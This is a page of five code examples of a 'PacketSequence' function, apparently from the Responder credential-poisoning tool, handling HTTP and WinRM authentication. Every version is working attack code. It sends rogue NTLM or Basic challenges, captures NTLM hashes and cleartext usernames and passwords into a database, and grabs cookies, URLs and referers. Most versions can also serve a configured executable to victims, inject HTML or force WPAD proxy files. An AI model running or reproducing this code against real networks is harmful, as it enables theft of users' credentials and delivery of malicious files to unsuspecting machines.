Exemplo n.º 1
0
def PacketSequence(data, client, Challenge):
	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

	if NTLM_Auth or NTLM_Auth2:
		if NTLM_Auth2:
			Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
		if NTLM_Auth:
			Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

		if Packet_NTLM == b'\x01':
			Buffer = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
			Buffer.calculate()
			if NTLM_Auth2:
				Buffer_Ans = WinRM_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
				return Buffer_Ans
			else:
				Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
				return Buffer_Ans

		if Packet_NTLM == b'\x03':
			if NTLM_Auth2:
				NTLM_Auth = b64decode(''.join(NTLM_Auth2))
			else:
				NTLM_Auth = b64decode(''.join(NTLM_Auth))

			ParseHTTPHash(NTLM_Auth, Challenge, client, "WinRM")
			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
			Buffer.calculate()
			return Buffer

	elif Basic_Auth:
		ClearText_Auth = b64decode(''.join(Basic_Auth))

		SaveToDb({
			'module': 'WinRM', 
			'type': 'Basic', 
			'client': client, 
			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
			})

		Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
		Buffer.calculate()
		return Buffer
	else:
		if settings.Config.Basic:
			Response = IIS_Basic_401_Ans()
			if settings.Config.Verbose:
				print(text("[WinRM] Sending BASIC authentication request to %s" % client))

		else:
			Response = IIS_Auth_401_Ans()
			if settings.Config.Verbose:
				print(text("[WinRM] Sending NTLM authentication request to %s" % client))

		return Response
Exemplo n.º 2
0
def PacketSequence(data, client):
    NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
    Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

    # Serve the .exe if needed
    if settings.Config.Serve_Always == True or (
            settings.Config.Serve_Exe == True and re.findall('.exe', data)):
        return RespondWithFile(client, settings.Config.Exe_Filename,
                               settings.Config.Exe_DlName)

    # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    WPAD_Custom = WpadCustom(data, client)

    if NTLM_Auth:
        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

        if Packet_NTLM == "\x01":
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans()
            Buffer_Ans.calculate(str(Buffer))

            return str(Buffer_Ans)

        if Packet_NTLM == "\x03":
            NTLM_Auth = b64decode(''.join(NTLM_Auth))
            ParseHTTPHash(NTLM_Auth, client)

            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)
                return WPAD_Custom

            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return str(Buffer)

    elif Basic_Auth:
        ClearText_Auth = b64decode(''.join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        SaveToDb({
            'module': 'HTTP',
            'type': 'Basic',
            'client': client,
            'user': ClearText_Auth.split(':')[0],
            'cleartext': ClearText_Auth.split(':')[1],
        })

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)
            return WPAD_Custom

        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return str(Buffer)

    else:
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print text(
                    "[HTTP] Sending BASIC authentication request to %s" %
                    client)

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending NTLM authentication request to %s" %
                           client)

        return str(Response)
Exemplo n.º 3
0
def PacketSequence(data, client):
	NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
	Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

	# Serve the .exe if needed
	if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
		return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

	# Serve the custom HTML if needed
	if settings.Config.Serve_Html == True:
		return RespondWithFile(client, settings.Config.Html_Filename)

	WPAD_Custom = WpadCustom(data, client)
	
	if NTLM_Auth:
		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

		if Packet_NTLM == "\x01":
			GrabURL(data, client)
			GrabHost(data, client)
			GrabCookie(data, client)

			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
			Buffer.calculate()

			Buffer_Ans = IIS_NTLM_Challenge_Ans()
			Buffer_Ans.calculate(str(Buffer))

			return str(Buffer_Ans)

		if Packet_NTLM == "\x03":
			NTLM_Auth = b64decode(''.join(NTLM_Auth))
			ParseHTTPHash(NTLM_Auth, client)

			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
				print text("[HTTP] WPAD (auth) file sent to %s" % client)
				return WPAD_Custom

			else:
				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
				Buffer.calculate()
				return str(Buffer)

	elif Basic_Auth:
		ClearText_Auth = b64decode(''.join(Basic_Auth))

		GrabURL(data, client)
		GrabHost(data, client)
		GrabCookie(data, client)

		SaveToDb({
			'module': 'HTTP', 
			'type': 'Basic', 
			'client': client, 
			'user': ClearText_Auth.split(':')[0], 
			'cleartext': ClearText_Auth.split(':')[1], 
		})

		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
			if settings.Config.Verbose:
				print text("[HTTP] WPAD (auth) file sent to %s" % client)
			return WPAD_Custom

		else:
			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
			Buffer.calculate()
			return str(Buffer)

	else:
		if settings.Config.Basic == True:
			Response = IIS_Basic_401_Ans()
			if settings.Config.Verbose:
				print text("[HTTP] Sending BASIC authentication request to %s" % client)

		else:
			Response = IIS_Auth_401_Ans()
			if settings.Config.Verbose:
				print text("[HTTP] Sending NTLM authentication request to %s" % client)

		return str(Response)
Exemplo n.º 4
0
def PacketSequence(data, client, Challenge):
    NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
    Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

    # Serve the .exe if needed
    if settings.Config.Serve_Always is True or (
            settings.Config.Serve_Exe is True and re.findall('.exe', data)):
        return RespondWithFile(client, settings.Config.Exe_Filename,
                               settings.Config.Exe_DlName)

    # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    WPAD_Custom = WpadCustom(data, client)
    # Webdav
    if ServeOPTIONS(data):
        return ServeOPTIONS(data)

    if NTLM_Auth:
        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
        if Packet_NTLM == b'\x01':
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(
                ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload=b64encode(
                NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
            #Buffer_Ans.calculate(Buffer)
            return Buffer_Ans

        if Packet_NTLM == b'\x03':
            NTLM_Auth = b64decode(''.join(NTLM_Auth))
            if IsWebDAV(data):
                module = "WebDAV"
            else:
                module = "HTTP"
            ParseHTTPHash(NTLM_Auth, Challenge, client, module)

            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print(text("[HTTP] WPAD (auth) file sent to %s" % client))

                return WPAD_Custom
            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return NetworkSendBufferPython2or3(Buffer)

    elif Basic_Auth:
        ClearText_Auth = b64decode(''.join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        SaveToDb({
            'module': 'HTTP',
            'type': 'Basic',
            'client': client,
            'user': ClearText_Auth.decode('latin-1').split(':')[0],
            'cleartext': ClearText_Auth.decode('latin-1').split(':')[1],
        })

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print(text("[HTTP] WPAD (auth) file sent to %s" % client))

            return WPAD_Custom
        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return NetworkSendBufferPython2or3(Buffer)
    else:
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print(
                    text("[HTTP] Sending BASIC authentication request to %s" %
                         client))

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print(
                    text("[HTTP] Sending NTLM authentication request to %s" %
                         client))

        return Response
Exemplo n.º 5
0
def PacketSequence(data, client):
    NTLM_Auth = re.findall(r"(?<=Authorization: NTLM )[^\r]*", data)
    Basic_Auth = re.findall(r"(?<=Authorization: Basic )[^\r]*", data)

    # Serve the .exe if needed
    if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall(".exe", data)):
        return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

        # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    WPAD_Custom = WpadCustom(data, client)
    # Webdav
    if ServeOPTIONS(data):
        return ServeOPTIONS(data)

    if NTLM_Auth:
        Packet_NTLM = b64decode("".join(NTLM_Auth))[8:9]
        if Packet_NTLM == "\x01":
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans()
            Buffer_Ans.calculate(str(Buffer))
            return str(Buffer_Ans)

        if Packet_NTLM == "\x03":
            NTLM_Auth = b64decode("".join(NTLM_Auth))
            if IsWebDAV(data):
                module = "WebDAV"
            else:
                module = "HTTP"
            ParseHTTPHash(NTLM_Auth, client, module)

            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

                return WPAD_Custom
            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return str(Buffer)

    elif Basic_Auth:
        ClearText_Auth = b64decode("".join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        SaveToDb(
            {
                "module": "HTTP",
                "type": "Basic",
                "client": client,
                "user": ClearText_Auth.split(":")[0],
                "cleartext": ClearText_Auth.split(":")[1],
            }
        )

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

            return WPAD_Custom
        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return str(Buffer)
    else:
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending BASIC authentication request to %s" % client)

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending NTLM authentication request to %s" % client)

        return str(Response)